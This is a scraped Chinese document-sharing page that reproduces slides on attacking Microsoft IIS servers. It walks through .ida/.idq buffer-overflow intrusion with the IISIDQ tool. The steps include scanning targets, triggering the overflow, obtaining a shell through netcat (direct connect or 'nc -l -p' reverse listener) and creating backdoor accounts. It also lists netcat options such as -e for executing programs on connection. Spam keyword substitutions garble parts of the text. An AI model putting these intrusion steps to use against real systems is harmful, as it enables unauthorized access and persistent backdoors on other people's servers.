- 1、本文档共36页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
IIS漏洞攻击
IIS漏洞攻击 基于认证的入侵 IPC$入侵 远程管理计算机 Telnet入侵 远程命令的执行及进程查杀 注册表的入侵 暴力破解密码 基于漏洞攻击概述 黑客是信息时代的完美主义者,他们通过研究、试验、编写测试代码来发现远程服务器中的漏洞 通过利用远程服务器的漏洞,可以绕过系统的认证直接进入系统内部 常用的漏洞 IIS漏洞 操作系统漏洞 SQL服务器漏洞 IIS漏洞概述 IIS(Internet Information Server),即Internet信息服务器,它在Windows系统中提供Internet服务,例如提供Web服务、FTP服务、SMTP服务 IIS服务器在方便用户使用的同时,带来了许多安全隐患。IIS漏洞有近千余种,其中能被用来入侵的漏洞大多数属于“溢出”型漏洞。 对于溢出型漏洞,入侵者可以通过发送特定指令格式的数据使远程服务区的缓冲区溢出,从而突破系统的保护,在溢出的空间中执行任意指令。 主要的IIS漏洞 .ida.idq漏洞 Printer漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞 IIS漏洞信息的搜集 使用扫描软件扫描存在漏洞的主机,例如使用X-Scan进行IIS漏洞的扫描 使用telnet targetIP 80搜集Web服务器版本信息 .ida.idq漏洞 微软的Index Server可以加快Web的有哪些信誉好的足球投注网站能力,提供对管理员脚本河Internet数据的查询,默认支持管理脚本.ida和查询脚本.idq 管理脚本.ida和查询脚本.idq都是使用idq.dll来进行解析的 idq.dll存在一个缓冲溢出,问题存在于idq.dll扩展程序上,由于没有对用户提交的输入参数进行边界检查,可以导致远程攻击者利用溢出来获得System权限访问远程系统 .ida.idq漏洞的检测 使用X-Scan、Sfind等检测工具 手工检测:在地址栏中输入http://targetIP/*.ida或者http://targetIP/*.idq IDQ入侵工具——IISIDQ IISIDQ有命令行和图形界面两种方式。使用IISIDQ攻击远程服务器后,有两种登录方式 攻击后主动连接方式命令 iisidq.exe操作系统类型目标IPWeb端口1端口监听端口[输入命令1] 攻击后监听远程服务器连接命令 iisidq.exe操作系统类型目标IPWeb端口2溢出连接IP溢出连接端口[输入命令1] 如果不写输入命令,默认命令为cmd.exe/c+dir。如果使用1,表示不使用默认命令而是要用户输入命令 IISIDQ支持的操作系统类型 0 IIS5 中文 Win2000 Sp0 1 IIS5 中文 Win2000 Sp1 2 IIS5 中文 Win2000 Sp2 漏洞溢出连接工具-NC nc在网络工具中有“瑞士军刀”的美誉,通过nc,入侵者可以方便的连接远程服务器 nc有两种方法进行连接 主动连接到外部:nc[-options] hostname port[s] [ports] 监听等待外部连接:nc –l –p port [-option] [hostname] [port] NC的使用参数说明 -e:prog程序重定向,一旦连接,就执行 -g:网关路由跳数,可设置到8 -h:帮助信息 -i:secs延时的间隔 -l:监听模式,用于入站连接 -n:指定数字的IP地址,不能用hostname -o:file记录16进制的传输 -p:port本地端口号 -r:任意指定本地及远程端口 -s:addr本地源地址 -u:UDP模式 -v:详细输出(用两个-v可得到更详细的内容) -w:secs超时时间 -z:将输入输出关掉——用于扫描时 .idq入侵实例(一) 步骤一:扫描远程服务器 步骤二:IDQ溢出。使用连接方式一进行idq漏洞溢出。使用的命令为iisidq 0 06 80 1 521 .idq入侵实例(一) 步骤三:使用nc进行连接。使用命令nc –v 06 521。 .idq入侵实例(一) 步骤四:建立后门帐号 步骤五:使用exit命令断开连接 比较命令如图所示 .idq入侵实例(二) 步骤一:扫描远程服务器 步骤二:使用nc在本地打开端口等待连接。使用命令 nc -l –p 250。参数-l表示使用监听模式,-p表示设置本地监听端口250 .idq入侵实例(二) 步骤三:IDQ溢出。使用命令iisidq 0 06 80 2 00 250 1采用方式二进行溢出,使远程服务器溢出后自动连接到本地计算机的250端口 .idq入侵实例(二) 步骤四:进行溢出后的攻击 步骤五:建立后门帐号 步骤六:使用exit命令断开连接 IISIDQ的图形界面 .printer漏洞 windows2000
文档评论(0)